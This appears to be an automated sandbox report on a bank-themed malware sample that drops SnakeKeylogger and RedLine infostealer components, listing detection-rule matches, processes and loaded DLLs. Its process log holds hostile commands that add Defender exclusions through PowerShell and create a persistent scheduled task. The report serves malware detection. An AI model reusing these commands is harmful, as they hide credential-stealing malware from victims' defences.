Source: 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Native_snake01.exe PID: 7396, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Native_snake01.exe PID: 7820, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: Ziraat_Bankasi_Swift_Messaji.png.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BZTCUCKTKd.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, hn5qlPppNiRmP7sbFp.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, hn5qlPppNiRmP7sbFp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, JGILNmq5ERBKBeTgX3.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, JGILNmq5ERBKBeTgX3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, JGILNmq5ERBKBeTgX3.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, hn5qlPppNiRmP7sbFp.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, hn5qlPppNiRmP7sbFp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, JGILNmq5ERBKBeTgX3.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, JGILNmq5ERBKBeTgX3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, JGILNmq5ERBKBeTgX3.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1750273319.00000000011BE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ational Typeface Corporation.slnt

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/17@7/5

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

9_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

9_2_004019F0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

File created: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Mutant created: \Sessions\1\BaseNamedObjects\OZfczCUwSsFOTQp

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Command line argument: 08A		9_2_00413780
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Command line argument: 08A		10_2_00413780

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Native_New-Nova.exe, 00000009.00000002.2956686994.000000000273A000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2956686994.000000000272B000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2956686994.000000000271C000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.0000000002579000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.000000000256A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ziraat_Bankasi_Swift_Messaji.png.exe	Virustotal: Detection: 70%
Source: Ziraat_Bankasi_Swift_Messaji.png.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

File read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_8-217

Source: unknown	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmpAE63.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe"
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmpAE63.tmp"
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe "C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe"
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
